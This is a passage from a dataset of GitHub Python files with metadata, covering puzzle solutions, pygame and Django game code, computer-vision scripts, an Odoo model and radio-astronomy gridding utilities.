3) the chosen sequence must be non-decreasing\n# Non-decreasing: a sequence A of length K satisfies A1 <= A2 <= ... <= Ak-1 <= Ak\n\n# Input: N M (1 <= M <= N <= 8)\n\n# Output: print every sequence satisfying the conditions, one per line\n# Sequences are printed in increasing lexicographic order\n
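# Passing i (not i + 1) to dfs below allows repeats while forbidding smaller indices, which is exactly the non-decreasing constraint.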
\ndef dfs(idx):\n    if len(k) == m:\n        print(*k)\n        return\n\n    for i in range(idx, n):  # narrow the candidate range to arr[idx] ~ arr[n-1]\n        k.append(arr[i])  # choose arr[i]\n        dfs(i)  # never choose an element smaller than arr[i]\n        k.pop()\n\nn, m = map(int, input().split())\narr = [i for i in range(1, n + 1)]\n\nk = []\ndfs(0)","repo_name":"monacaron/BOJ","sub_path":"15652_N&M(4).py","file_name":"15652_N&M(4).py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"21861637004","text":"import pygame\nimport game\nimport time\nimport assets.colours as colours\n\nfrom .button import Button\n\nclass MenuButton(Button):\n    \n    def __init__(self, interface, x=0, y=0, width=0, height=0, font=None, text=None, highlight_text=None):\n        super().__init__(interface, x, y, width, height, font, text)\n\n        self.font = pygame.font.Font(None, 30)\n        self.highlight_text = highlight_text\n\n        self.default_text_colour = self.text_colour = colours.GREY_BLACK\n        self.default_outer_rect_colour = self.outer_rect_colour = colours.BOARD\n        self.default_text = self.text\n\n    def draw(self):\n        \"\"\"\n        This function draws the menu button\n        - its base rectangle\n        - the inner rectangle and,\n        - the text\n        \n        If the user hovers over the button its outer rectangle and text are both changed\n        The default layout will be the board grid size, say:\n        4X4\n        5X5\n\n        Upon highlighting over it we will see the grid goal. e.g. 2048/4096\n        \"\"\"\n        self._draw_base_rectangle()\n\n        if self.hover:\n            self.outer_rect_colour = colours.YELLOW\n            self.text_colour = colours.WHITE \n            self.text = self.highlight_text\n        \n        else:\n            self.outer_rect_colour = self.default_outer_rect_colour\n            self.text_colour = self.default_text_colour\n            self.text = self.default_text\n        self._draw_inner_rectangle()\n\n        self._draw_text()\n        self.screen.blit(self.surface, (self.rect.x , self.rect.y)) \n\n    \"\"\"The following 4 functions are self-explanatory\"\"\"\n    def _draw_base_rectangle(self):\n        outer_rect = pygame.Rect(0, 0, self.width, self.height)\n        pygame.draw.rect(self.surface, self.outer_rect_colour, outer_rect, border_radius=5)\n\n    def _draw_inner_rectangle(self):\n        inner_x = self.width * 0.1 // 2\n        inner_y = self.height * 0.2 // 2\n        inner_rect = pygame.Rect(inner_x, inner_y, self.width*0.9, self.height*0.8)\n        pygame.draw.rect(self.surface, colours.DEFUALT_TILE, inner_rect, border_radius=5)\n\n    def _draw_text(self):\n        text = self.font.render(self.text, True, self.text_colour)\n        text_x = (self.width - text.get_width()) // 2\n        text_y = (self.height - text.get_height()) // 2\n        self.surface.blit(text, (text_x, text_y))\n    \n\n    def dissolve(self, start_time):\n        \"\"\"\n        This function changes the transparency of the buttons over 1s to give the appearance of dissolving\n        \"\"\"\n        # Calculate the time elapsed since the start of the loop\n        elapsed_time = pygame.time.get_ticks() - start_time\n\n        # Calculate the current alpha value based on elapsed time\n        current_alpha = max(0, 255 - (255 * elapsed_time / 1000))\n\n        # Set the new alpha value for the rectangle\n        self.surface.set_alpha(int(current_alpha))\n\n        if current_alpha == 0: \n            game.start_time = time.time()\n            return True\n        \n","repo_name":"LunaTMT/2048","sub_path":"buttons/menu_button.py","file_name":"menu_button.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"}
+{"seq_id":"3811182869","text":"import cv2\r\nimport mediapipe as mp\r\nimport handtrackingmodule as htm\r\n\r\npTime = 0\r\ncTime = 0\r\ncap = cv2.VideoCapture(0)\r\ntracker = htm.handTracker()\r\n\r\nwhile True:\r\n success,image = cap.read()\r\n image = tracker.handsFinder(image)\r\n lmList = tracker.positionFinder(image)\r\n if len(lmList) != 0:\r\n print(lmList[4])\r\n\r\n cTime = time.time()\r\n fps = 1/(cTime -pTime)\r\n pTime = cTime\r\n\r\n cv2.putText(image, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3,\r\n (255, 0, 255), 3)\r\n\r\n cv2.imshow(\"Video\",image)\r\n cv2.waitKey(1)","repo_name":"Tabeebashraf7/hand-detection-module","sub_path":"mynewgamehand.py","file_name":"mynewgamehand.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"28420513368","text":"from odoo import api, fields, models,_\n\nclass Lead(models.Model):\n _inherit = \"crm.lead\"\n\n z_project_site = fields.Many2one('site.name',string=\"Project Site\")\n\n z_partner_id = fields.Many2one('res.partner', string='Customer', track_visibility='onchange', track_sequence=1, index=True,\n help=\"Linked partner (optional). Usually created when converting the lead. You can find a partner by its Name, TIN, Email or Internal Reference.\")\n active = fields.Boolean('Active', default=True, track_visibility=True)\n\n","repo_name":"tgy5719/mcl","sub_path":"addon_fields_for_mcl/model/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"36687838388","text":"import os\nfrom collections import defaultdict\nimport networkx as nx\nimport requests\nimport requests_cache\nfrom intcode import IntCode\n\ndirections = {\n 1: (0, 1),\n 2: (0, -1),\n 3: (-1, 0),\n 4: (1, 0)\n}\n\nWALL = \"#\"\nOXYGEN = \"x\"\nMOVE = \".\"\n\n\ndef part1(lines):\n program = IntCode(lines)\n grid = create_grid(program)\n\n graph = nx.Graph()\n for coord, area in grid.items():\n if not area == WALL:\n graph.add_node(coord)\n new_positions = [new_pos(coord, d) for d in directions.values()]\n not_blocking = [i for i in new_positions if not grid[i] == WALL]\n for edge in not_blocking:\n graph.add_edge(coord, edge)\n path = nx.shortest_path_length(graph, (0, 0), get_target(grid))\n\n return path\n\n\ndef part2(lines):\n program = IntCode(lines)\n grid = create_grid(program)\n return fill_oxygen(grid, get_target(grid), 0, 0)\n\n\ndef get_target(grid):\n return [i for i in grid if grid[i] == OXYGEN][0]\n\n\ndef new_pos(pos, direction):\n return pos[0] + direction[0], pos[1] + direction[1]\n\n\ndef create_grid(program):\n known_cells = defaultdict(int)\n grid = defaultdict(str)\n pos = (0, 0)\n\n while not program.halt and sum(known_cells.values()) < 10000: # arbitrary high number\n direction = find_next_area(grid, pos, known_cells)\n output = program.operation(direction)\n move = directions[direction]\n known_cells[pos] += 1\n\n if output == 0:\n new_position = new_pos(pos, move)\n grid[new_position] = WALL\n\n else:\n pos = new_pos(pos, move)\n grid[pos] = MOVE if output == 1 else OXYGEN\n\n return grid\n\n\ndef find_next_area(grid, pos, known_cells):\n new_positions = [{\"id\": d[0], \"pos\": new_pos(pos, d[1])} for d in directions.items()]\n idx = [x for x in new_positions if x[\"pos\"] not in grid]\n if len(idx) > 0:\n return idx[0][\"id\"]\n\n least_visited_cells = 10000 # arbitrary high number\n least_visited = {}\n\n 
not_blocked_positions = [x for x in new_positions if grid[x[\"pos\"]] != \"#\"]\n for i in not_blocked_positions:\n if least_visited_cells > known_cells[i[\"pos\"]]:\n least_visited_cells = known_cells[i[\"pos\"]]\n least_visited = i\n return least_visited[\"id\"]\n\n\ndef fill_oxygen(grid, target, time, total):\n new_positions = [new_pos(target, d) for d in directions.values()]\n for pos in new_positions:\n if grid[pos] == MOVE:\n grid[pos] = OXYGEN\n total = fill_oxygen(grid, pos, time + 1, total)\n return max(time, total)\n\n\ndef get_input_file():\n requests_cache.install_cache('../cache')\n path = os.path.abspath(__file__).split('/')\n url = 'https://adventofcode.com/' + path[-3] + '/day/' + path[-2] + '/input'\n lines = requests.get(url, cookies={\"session\": os.environ['SESSION']}).text.strip().split(\",\")\n return lines\n\n\ndef main():\n lines = get_input_file()\n instruction = [int(x) for x in lines]\n\n print(part1(instruction))\n print(part2(instruction))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lnyman1/adventofcode2019","sub_path":"2019/15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"34704194732","text":"import os\nimport time\n\nimport cv2\nimport numpy as np\n\ntime_start = time.time()\n\ncampaigns = [\n \"2000_ARM\",\n \"2002_CRYSTAL-FACE-NASA\",\n \"2002_CRYSTAL-FACE-UND\",\n \"2003_AIRS_II\",\n \"2004_Midcix\",\n \"2007_ICE_L\",\n \"MPACE\",\n]\nfor campaign in campaigns:\n print(campaign)\n rootdir = \"../cpi_data/campaigns/\" + campaign + \"/good_lowcutoff/\"\n savedir = \"../cpi_data/campaigns/\" + campaign + \"/masked_background/\"\n for subdir, dirs, files in os.walk(rootdir):\n\n for file in files:\n\n image_og = cv2.imread(os.path.join(subdir, file), cv2.IMREAD_UNCHANGED)\n image_og = cv2.cvtColor(image_og, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(image_og, cv2.COLOR_BGR2GRAY)\n thresh = cv2.threshold(gray, 50, 255, cv2.THRESH_BINARY_INV)[1]\n\n # get largest contour\n contours, _ = cv2.findContours(\n thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE\n )\n # returns image, contours, hierarchy\n if len(contours) != 0:\n mask = np.zeros(image_og.shape[:2], dtype=\"uint8\")\n big_contour = max(contours, key=cv2.contourArea)\n draw = cv2.drawContours(mask, [big_contour], 0, (255, 255, 255), -1)\n\n final = cv2.bitwise_and(image_og, image_og, mask=mask)\n\n # save result\n direct = subdir.split(\"/\")[-1]\n if not os.path.exists(os.path.join(savedir, direct)):\n os.makedirs(os.path.join(savedir, direct), exist_ok=True)\n cv2.imwrite(os.path.join(savedir, direct, file), final)\n\n time_end = time.time() - time_start\n print(\"processed %s campaign in %d seconds\" % (campaign, time_end))\n","repo_name":"vprzybylo/cocpit","sub_path":"processing_scripts/mask_background_multcampaigns.py","file_name":"mask_background_multcampaigns.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"34139329631","text":"from django.shortcuts import render, render_to_response,RequestContext,redirect \nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.template.context import RequestContext\nfrom django.contrib.auth.models import User\n \nfrom .models import Alimento\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.forms import 
UserCreationForm,AuthenticationForm\nfrom django.contrib.auth import login, authenticate, logout\n#from BodyControl.apps.food.managers import Pasta\n\n\n@login_required()\ndef load_foods(request,estado_id):\n\tfoods = Alimento.objects.filter(estado=estado_id)\n\t#f = Pasta();\n\t#foods = Alimento.f.all()\n\t \n\treturn render(request, \"food/foods.html\", {'foods':foods})\n\n@login_required()\ndef add(request):\n if request.POST:\n form = Estado(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.save()\n return redirect(reverse(\"home\"))\n else:\n form = Estado()\n return render(request, \"status/add_status.html\", {'form_status':form})\n@login_required()\ndef edit(request,food_id):\n if request.POST:\n form = Estado(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.save()\n return redirect(reverse(\"home\"))\n else:\n form = Estado()\n return render(request, \"status/add_status.html\", {'form_status':form})\n \n@login_required()\ndef delete(request,food_id):\n if request.POST:\n form = Estado(request.POST)\n if form.is_valid(): \n post = form.save(commit=False)\n post.save()\n return redirect(reverse(\"home\"))\n else:\n form = Estado()\n return render(request, \"status/add_status.html\", {'form_status':form})","repo_name":"leoarequipa/BodyControlDjango","sub_path":"BodyControl/apps/food/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"2874785706","text":"from django.core.exceptions import BadRequest\nfrom django.http import HttpRequest, HttpResponse, JsonResponse\n\nfrom .exceptions import PoisonException\nfrom .messages import (\n CreateGameRequest,\n CreatePlayerRequest,\n JoinGameRequest,\n PerformActionRequest,\n PollGameRequest,\n StartGameRequest\n)\nfrom .models import Game, Player\nfrom . 
import game\n\n\ndef error_handler(f):\n    def wrapper(*args):\n        try:\n            return f(*args)\n        except PoisonException as e:\n            return e.to_response()\n    return wrapper\n\n\ndef index(request):\n    # type: (HttpRequest) -> HttpResponse\n    return HttpResponse(\"Web-app here\")\n\n\n@error_handler\ndef create_player(request):\n    # type: (HttpRequest) -> JsonResponse\n\n    req = CreatePlayerRequest(request.body)\n    player = Player(name=req.name)\n    player.save()\n\n    return JsonResponse({'id': player.key})\n\n\n@error_handler\ndef create_game(request):\n    # type: (HttpRequest) -> JsonResponse\n\n    req = CreateGameRequest(request.body)\n    g = game.create_game(req.player_id)\n    \n    return JsonResponse(game.encode_game(g, req.player_id))\n\n\n@error_handler\ndef join_game(request):\n    # type: (HttpRequest) -> JsonResponse\n\n    req = JoinGameRequest(request.body)\n    g = game.join_game(req.game_id, req.player_id)\n    return JsonResponse(game.encode_game(g, req.player_id))\n\n\n@error_handler\ndef start_game(request):\n    # type: (HttpRequest) -> JsonResponse\n\n    req = StartGameRequest(request.body)\n    g = game.start_game(req.game_id, req.player_id)\n    return JsonResponse(game.encode_game(g, req.player_id))\n\n\n@error_handler\ndef poll_game(request):\n    # type: (HttpRequest) -> JsonResponse\n\n    req = PollGameRequest(request.body)\n    try:\n        g = Game.objects.get(pk=req.game_id)\n    except Exception:\n        raise BadRequest(f'Bad game id: {req.game_id}')\n\n    return JsonResponse(game.encode_game(g, req.player_id))\n\n\n@error_handler\ndef perform_action(request):\n    # type: (HttpRequest) -> JsonResponse\n\n    req = PerformActionRequest(request.body)\n    g = game.perform_action(req.game_id, req.player_id, req.kind, req.params)\n    return JsonResponse(game.encode_game(g, req.player_id))\n","repo_name":"benreid24/Poison","sub_path":"server/poison/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3483548939","text":"#!/usr/bin/python\n\"\"\"Group bins and apply functions.\n\nA set of functions for grouping data on one- or two-dimensional bins and\nefficiently applying functions to the resulting groups. To be used with Dask\ndelayed for multicore and distributed processing.\n\nTodo:\n    * Rewrite as a couple of classes instead of disjointed functions\n    * Add error checking\n    * Fix index problem at row 0 and -1\n    * Implement sparse arrays for 2D bin grid\n\"\"\"\n\nimport numpy as np\nimport numba as nb\nfrom numba import literal_unroll\n\nimport dask.array as da\nimport xarray as xr\n\nfrom dask.array.core import slices_from_chunks\n\nfrom .annulus_stats import median_absolute_deviation\n\n# @nb.jit(nopython=False, cache=True)\ndef sort_bins(uvbins, values, flags=None):\n    \"\"\" Sort the input array with respect to the u and v bin indices. We use \n    lexsort, which is not currently implemented in numba.\n\n    Parameters\n    ----------\n    uvbins : int64 array of size (npoints, 3)\n        A numpy array with three columns for u and v bin indices and ms index.\n    values : float32 array of size (npoints, 1)\n        A one-dimensional value array. 
\n flags (optional) : boolean array of size (npoints)\n An array of existing flags from MS file.\n\n Returns\n -------\n uvbins, values \n Sorted input array of same name\n \"\"\"\n idx = np.lexsort(np.array([uvbins[:,1], uvbins[:,0]])) # no numba type for np.lexsort, either use nopython=False or fix lexsort implementation included below \n uvbins = uvbins[idx]\n values = values[idx]\n\n if not flags is None:\n flags = flags[idx]\n # Find indicies of rows to keep\n flg_idx = np.where(flags==False)\n print(\"MS file flags:\\t Removed {:.2f}% - {}/{} rows.\".format( \n 100*(len(flags) - len(flg_idx[0]))/len(flags), (len(flags) - len(flg_idx[0])), len(values))\n )\n values = values[flg_idx]\n uvbins = uvbins[flg_idx]\n\n null_flags = uvbins[np.where(values==0)]\n\n uvbins = uvbins[np.where(values!=0)]\n print(\"Zero values:\\t Removed {:.2f}% - {}/{} rows.\".format(\n 100*len(null_flags)/float(len(values)), len(null_flags), len(values))\n )\n\n values = values[np.where(values!=0)]\n\n return uvbins, values, null_flags[:,2]\n\n\n# @nb.jit(nopython=False)\ndef sort_bins_multi(uvbins, values, flags=None):\n idx = np.lexsort(np.array([uvbins[:,1], uvbins[:,0]])) # no numba type for np.lexsort, either use nopython=False or fix lexsort implementation included below \n uvbins = uvbins[idx]\n values = values[idx]\n\n if not flags is None:\n flags = flags[idx]\n # Find indicies of rows to keep\n flg_idx = np.where(flags==False)\n print(\"MS file flags:\\t Removed {:.2f}% - {}/{} rows.\".format( \n 100*(len(flags) - len(flg_idx[0]))/len(flags), (len(flags) - len(flg_idx[0])), len(values))\n )\n values = values[flg_idx]\n uvbins = uvbins[flg_idx]\n\n # Filter rows with zero values (often this is done by pre-flagging)\n null_idx = np.where(np.sum(values, axis=1)==0.)\n pos_idx = np.where(np.sum(values, axis=1)!=0.)\n null_flags = uvbins[null_idx]\n\n uvbins = uvbins[pos_idx]\n print(\"Zero values:\\t Removed {:.2f}% - {}/{} rows.\".format(\n 100*len(null_flags)/float(len(values)), len(null_flags), len(values))\n )\n values = values[pos_idx]\n\n return uvbins, values, null_flags[:,2]\n\n\n\n# @nb.njit(\n# nb.types.Tuple(\n# (nb.int64[:,::1], nb.float32[:,::1], nb.int64[:,::1], nb.int64[::1])\n# )(nb.int64[:,::1], nb.float32[:,::1], nb.int64[::1]),\n# locals={\n# \"ubin_prev\": nb.int64,\n# \"vbin_prev\": nb.int64,\n# \"k\": nb.uint32\n# },\n# nogil=True\n# )\n@nb.njit(nogil=True)\ndef create_bin_groups_sort(uvbins, values, null_flags):\n \"\"\"\n Sort U and V bins for a partition of a dataset such that uv bins are contiguous \n in the datset. Return sorted data arrays for the bins, indicies, and values \n and a corresponding mapping of uv bins to indexical positions in these arrays. 
\n Allows for contiguous and pre-computable memory allocations for the data.\n \n Parameters\n ----------\n uvbins : dask.array\n A dask array with three columns: u and v bins and index for one partition.\n values : dask.array\n A dask array with visibility values corresponding to the uvbins rows.\n null_flags :\n List of indicies for rows with zero value, this is passed through without change.\n \n Returns\n -------\n uvbins: np.array\n A sorted array with u and v bins and indicies.\n values:\n A sorted array with values.\n grid_row_map:\n A tuple with one row for each unique UV bin pair and its starting index in the \n uvbins and values arrays.\n null_flags:\n List of indicies for rows with zero value.\n \"\"\"\n \n # Return a null set if all values in the sub-grid have been removed already\n if len(uvbins) == 0:\n grid_row_map = np.array([[0, 0, 0], [-1, -1, 1]], dtype=np.int64)\n return uvbins, values, grid_row_map, null_flags\n\n\n ubin_prev, vbin_prev = uvbins[0][0], uvbins[0][1]\n grid_row_map = [[ubin_prev, vbin_prev, 0]]\n \n k = 0\n for row in uvbins:\n if ((row[0] != ubin_prev) | (row[1] != vbin_prev)):\n ubin_prev, vbin_prev = row[0], row[1]\n grid_row_map.append([ubin_prev, vbin_prev, k])\n k = k+1\n\n grid_row_map.append([-1, -1, len(uvbins)]) # Add the upper index for the final row\n grid_row_map = np.array(grid_row_map, dtype=np.int64)\n \n return uvbins, values, grid_row_map, null_flags\n\n\n@nb.njit(nogil=True)\ndef apply_grid_median(values, grid_row_map):\n \"\"\"\n Apply a function broadcasting across all values in each bin within a given \n partition. Operates on the output of the create_bin_groups_sort function.\n \n Parameters\n ----------\n values : np.array\n A sorted array with values.\n grid_row_map : np.array\n A tuple with one row for each unique UV bin pair and its starting index \n in the uvbins and values arrays.\n \n Returns\n -------\n function_grid : array-like\n A two dimensional array of uv bins with values of the given function \n applied to the bins.\n \"\"\"\n \n function_grid = np.zeros(((np.max(grid_row_map[:,0])+1), (np.max(grid_row_map[:,1])+1)), dtype=np.float32)\n\n print('Applying function to grid_map.')\n for i_bin, bin_location in enumerate(grid_row_map[:-1]):\n u, v = bin_location[:2]\n istart, iend = grid_row_map[i_bin][2], grid_row_map[i_bin+1][2]\n\n function_grid[u][v] = np.median(values[istart:iend])\n\n return function_grid\n\n\n@nb.njit(nogil=True)\ndef apply_grid_mad(values, grid_row_map):\n \"\"\"\n Apply a function broadcasting across all values in each bin within a given \n partition. 
Operates on the output of the create_bin_groups_sort function.\n    \n    Parameters\n    ----------\n    values : np.array\n        A sorted array with values.\n    grid_row_map : np.array\n        An array with one row for each unique UV bin pair and its starting index \n        in the uvbins and values arrays.\n    \n    Returns\n    -------\n    function_grid : array-like\n        A two dimensional array of uv bins with the MAD of each bin's values.\n    \"\"\"\n    function_grid = np.zeros(((np.max(grid_row_map[:,0])+1), (np.max(grid_row_map[:,1])+1)))\n\n    print('Applying function to grid_map.')\n    for i_bin, bin_location in enumerate(grid_row_map[:-1]):\n        u, v = bin_location[:2]\n        istart, iend = grid_row_map[i_bin][2], grid_row_map[i_bin+1][2]\n\n        function_grid[u][v] = median_absolute_deviation(values[istart:iend])\n\n    return function_grid\n    \n\n# @nb.njit(nogil=True)\ndef apply_grid_function(values, grid_row_map, function):\n    \"\"\"\n    Apply a function broadcasting across all values in each bin within a given \n    partition. Operates on the output of the create_bin_groups_sort function.\n    \n    Parameters\n    ----------\n    values : np.array\n        A sorted array with values.\n    grid_row_map : np.array\n        An array with one row for each unique UV bin pair and its starting index \n        in the uvbins and values arrays.\n    function : callable\n        Function applied to the values of each bin.\n    \n    Returns\n    -------\n    function_grid : array-like\n        A two dimensional array of uv bins with values of the given function applied to \n        the bins.\n    \"\"\"\n    function_grid = np.zeros(((np.max(grid_row_map[:,0])+1), (np.max(grid_row_map[:,1])+1)))\n\n    print('Applying function to grid_map.')\n    for i_bin, bin_location in enumerate(grid_row_map[:-1]):\n        u, v = bin_location[:2]\n        istart, iend = grid_row_map[i_bin][2], grid_row_map[i_bin+1][2]\n\n        function_grid[u][v] = function(values[istart:iend])\n\n    return function_grid\n\n\n# @nb.jit(nopython=True, nogil=True, cache=True)\ndef combine_function_partitions(median_chunks):\n    \"\"\"\n    Combine a set of uv grid partitions into a complete uv grid.\n    \n    Parameters\n    ----------\n    median_chunks : array-like\n        A set of uv grids each containing values for mutually orthogonal \n        partitions of the full grid.\n\n    Returns\n    -------\n    function_grid : array-like \n        The combined uv grid.\n    \"\"\"\n    dim1 = np.max(np.array([chunk.shape[0] for chunk in median_chunks], dtype=np.int32))\n    dim2 = np.max(np.array([chunk.shape[1] for chunk in median_chunks], dtype=np.int32))\n\n    function_grid = np.zeros((dim1, dim2))\n    for k, chunk in enumerate(median_chunks):\n        cshape = chunk.shape\n#         print(f\"chunk: {k}, {cshape[0]}, {cshape[1]}\")\n#         print(function_grid[:cshape[0],:cshape[1]].shape)\n        function_grid[:cshape[0],:cshape[1]] += chunk\n    return function_grid\n\n\n\n# ---------------------------------------------------------------------------------\n\ndef combine_annulus_results(median_grid_chunks, count_grid_chunks, flag_list_chunks, val_flag_chunks):\n    '''Dask Delayed function to concatenate chunked output data from annulus_stats functions.'''\n    flag_list = np.concatenate(flag_list_chunks)\n    val_flag_list = np.concatenate(val_flag_chunks)\n    median_grid = combine_function_partitions(median_grid_chunks)\n    count_grid = combine_function_partitions(count_grid_chunks)\n\n    return flag_list, val_flag_list, median_grid, count_grid\n\n\n\n# ---------------------------------------------------------------------------------\n\n\n\n#@nb.njit(\n#    nb.types.Tuple(\n#        (nb.int32, nb.int32[::1], nb.int32[::1], nb.float32[:], nb.boolean[::1], nb.int64[::1])\n#    )(nb.int32[::1], nb.int32[::1], nb.float32[:], nb.boolean[::1], nb.int64[::1], 
nb.float64),\n#    locals={\n#        \"i\": nb.uint32,\n#        \"j\": nb.uint32,\n#        \"v_tmp\": nb.float32[::1]\n#    },\n#    nogil=True\n#)\n@nb.njit(nogil=True, cache=True)\ndef partition_permutation(a, b, v, f, p, pivot):\n    ''' Partition the first input array around the pivot value and reorder all \n    the input arrays with the same swaps.\n\n    Parameters\n    ----------\n    a, b: array of int32 of shape (npoints)\n        Either u or v bins \n    v: array float32 (npoints)\n        Representation of visibility data such as amplitude, real, imaginary, \n        etc. - one dimensional\n    f: array of bool (npoints)\n        Flags carried along with the data through the permutation.\n    p: array of int64 (npoints)\n        Indices corresponding to the order in the source measurement set for inverting.\n    pivot: int32\n        Pivot point to use for partial sort - all points less than or equal to the \n        pivot will be in the first part of the array.\n\n    Returns\n    -------\n    i: int32\n        The index of the partition boundary in the output arrays (the number of \n        points <= pivot).\n    a, b, v, f, p\n        The partially sorted input arrays\n    '''\n\n    i = 0\n    for j in range(len(a)):\n        if a[j] <= pivot:\n            a[i], a[j] = a[j], a[i]\n            b[i], b[j] = b[j], b[i]\n            v[i], v[j] = v[j], v[i]\n            f[i], f[j] = f[j], f[i]\n            p[i], p[j] = p[j], p[i]\n            i += 1\n\n    return i, a, b, v, f, p\n    \n\n@nb.njit(\n    nb.types.Tuple(\n        (nb.int32, nb.int32[::1], nb.int32[::1], nb.float32[:,::1], nb.boolean[::1], nb.int64[::1])\n    )(nb.int32[::1], nb.int32[::1], nb.float32[:,::1], nb.boolean[::1], nb.int64[::1], nb.float64),\n    locals={\n        \"i\": nb.uint32,\n        \"j\": nb.uint32,\n        \"v_tmp\": nb.float32[::1]\n    },\n    nogil=True\n)\ndef partition_permutation_multi(a, b, v, f, p, pivot):\n    ''' Partition the first input array around the pivot value and reorder all \n    the input arrays with the same swaps.\n\n    Parameters\n    ----------\n    a, b: array of int32 of shape (npoints)\n        Either u or v bins \n    v: array float32 (npoints, npol)\n        Representation of visibility data such as amplitude, real, imaginary, \n        etc. 
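# A small, made-up illustration of partition_permutation above: every entry of
# `a` that is <= pivot is swapped to the front, the companion arrays receive
# the identical swaps, and the returned i marks the split point. This assumes
# the lazily-compiled @nb.njit version accepts these dtypes.
import numpy as np

a = np.array([5, 1, 7, 3], dtype=np.int32)
b = np.array([0, 1, 2, 3], dtype=np.int32)
v = np.array([0.5, 0.1, 0.7, 0.3], dtype=np.float32)
f = np.zeros(4, dtype=np.bool_)
p = np.arange(4, dtype=np.int64)

i, a, b, v, f, p = partition_permutation(a, b, v, f, p, 4.0)
# i == 2 and a == [1, 3, 7, 5]: the two entries <= 4 now lead the array, and
# p == [1, 3, 2, 0] still maps each row back to its original position.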
- two dimensional to allow for multiple polarization states.\n    f: array of bool (npoints)\n        Flags carried along with the data through the permutation.\n    p: array of int64 (npoints)\n        Indices corresponding to the order in the source measurement set for inverting.\n    pivot: int32\n        Pivot point to use for partial sort - all points less than or equal to the \n        pivot will be in the first part of the array.\n\n    Returns\n    -------\n    i: int32\n        The index of the partition boundary in the output arrays (the number of \n        points <= pivot).\n    a, b, v, f, p\n        The partially sorted input arrays\n    '''\n\n    i = 0\n    for j in range(len(a)):\n        if a[j] <= pivot:\n            a[i], a[j] = a[j], a[i]\n            b[i], b[j] = b[j], b[i]\n\n            v_tmp = v[i].copy()\n            v[i] = v[j]\n            v[j] = v_tmp\n\n            f[i], f[j] = f[j], f[i]\n            p[i], p[j] = p[j], p[i]\n            i += 1\n\n    return i, a, b, v, f, p\n\n","repo_name":"idia-astro/gridflag","sub_path":"gridflag/groupby_partition.py","file_name":"groupby_partition.py","file_ext":"py","file_size_in_byte":13559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"}
{"seq_id":"2197072581","text":"class Solution:\n    def smallerNumbersThanCurrent(self, nums: List[int]) -> List[int]:\n        hash_list = [0] * 101\n        for n in nums:\n            hash_list[n] += 1\n\n        sum_list = [0] * 100\n        the_sum = 0\n        for n in range(100):\n            the_sum += hash_list[n]\n            sum_list[n] = the_sum\n\n        result = []\n        for n in nums:\n            if n == 0:\n                result.append(0)\n            else:\n                result.append(sum_list[n - 1])\n\n        return result","repo_name":"willcoderwang/leetcode","sub_path":"1365.py","file_name":"1365.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"42071103889","text":"s = input() # the input string\r\n# find the remainder when dividing the length by 4\r\n# it can be 3, 2, 1 or 0\r\n# start the new string with a prefix of the current string whose length equals the remainder\r\nif len(s)% 4 == 1:\r\n    d = s[0] + ' '\r\n    a = 1 # coefficient to adjust the start of the loop\r\nif len(s)% 4 == 2:\r\n    d = s[0] + s[1]+ ' '\r\n    a = 1\r\nif len(s)% 4 == 3:\r\n    d = s[0] + s[1]+ s[2] + ' '\r\n    a = 1\r\nif len(s)% 4 == 0:\r\n    d = ''\r\n    a = 0\r\n\r\nfor x in range(len(d)-a,len(s)-3,4):\r\n    d = d+ s[x]+ s[x+1]+s[x+2]+s[x+3]+ ' '\r\nprint(d)","repo_name":"liva2/yandex_book","sub_path":"tetradi.py","file_name":"tetradi.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"24543354406","text":"from random import randint, shuffle\nfrom procgame.dmd import ExpandTransition, Frame, FrameLayer, GroupedLayer, ScriptedLayer, TextLayer\nfrom procgame.game import Mode, SwitchStop\n\nclass ShootingGallery(Mode):\n    def __init__(self, game, priority, video_mode_setting):\n        super(ShootingGallery, self).__init__(game, priority)\n        self.on_complete = None\n\n        if video_mode_setting == 'cow':\n            # family friendly option\n            self.enemy_text = 'Shoot mean cows'\n            self.friend_text = 'Do NOT shoot nice cows'\n            self.bad_guy_shot = 'moo'\n            cows_anim = self.game.animations['cows']\n            image_frames = cows_anim.frames[0].create_frames_from_grid(2, 1)\n            self.all_friends = [image_frames[0]] * 4\n            self.all_enemies = [image_frames[1]] * 4\n        else:\n            # default option\n            self.enemy_text = 'Shoot enemies'\n            self.friend_text = 'Do NOT shoot friends'\n            self.bad_guy_shot = 'bad guy shot'\n            gallery_anim = self.game.animations['jdpeople']\n            image_frames = gallery_anim.frames[0].create_frames_from_grid(6, 2)\n            self.all_enemies = image_frames[0:6]\n            